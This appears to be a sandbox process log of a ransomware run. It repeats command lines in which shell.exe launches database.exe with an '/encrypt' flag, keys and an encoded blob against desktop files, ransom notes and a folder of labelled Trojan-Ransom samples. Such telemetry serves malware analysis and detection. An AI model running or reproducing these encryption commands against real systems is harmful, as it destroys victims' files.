"+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ResetCopy.mpeg.sage.gif"5⤵PID:4632
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\Restore-My-Files.txt"5⤵PID:4540
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\RestoreExpand.fon.sage.gif"5⤵PID:5048
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\RevokeHide.vsx.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:1544
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ShowPush.jpg.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:2824
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ShowSync.rle.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:4548
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\StartRemove.mpeg3.sage.gif"5⤵PID:1176
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\sWiVkIcd-unycY7aQ.[[email protected]].gif"5⤵PID:5756
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\TestUndo.ppt.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:7028
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\TUKJxPJj-ELwXopms.[[email protected]].gif"5⤵PID:6684
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\UnblockRestore.jtx.sage.gif"5⤵PID:5924
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\uWPwQFnd-mjxwmm85.[[email protected]].gif"5⤵PID:5380
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\WriteResolve.dib.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:4520
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\WZos2rLV-wyxty8Lk.[[email protected]].gif"5⤵PID:5744
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\[HOW_TO_DECRYPT_FILES].html"5⤵PID:1872
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\2aua0mwa.exe"5⤵PID:1492
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\HEUR-Trojan-Ransom.MSIL.Blocker.gen-57c4578f5aeecf623987474b555093aef07bed73797aca041afd31e0e67351ef.gif"5⤵PID:6620
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\HEUR-Trojan-Ransom.MSIL.Crypmod.gen-d5086f660b09c07006a213469edbb78549596e9231953993cc7ab43f14a1caec.gif"5⤵PID:4492
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\HEUR-Trojan-Ransom.MSIL.Encoder.gen-26750ee4c44e015354e290cf0f064a52340e623fc5df8986d9c4c3dce62cd066.gif"5⤵PID:5504
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\HEUR-Trojan-Ransom.Win32.Agent.gen-c258088499ef0bcd93fa23f726bef802a11fe8aa03b95262f827e0a7c01aa2c5.gif"5⤵PID:2052
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\HEUR-Trojan-Ransom.Win32.Blocker.gen-bd8d1fb9b2ffb5690b84e32e5d6c794d42ec4ec753222478092776ea1e483991.gif"5⤵PID:4868
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\HEUR-Trojan-Ransom.Win32.Generic-8a57e361887aca6d776de1c2cc8f1f30cfddd2cf882726fab12084f06bda0c1a.gif"5⤵PID:2864
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\KEYIDS.KLST.gif"5⤵PID:2588
-
-
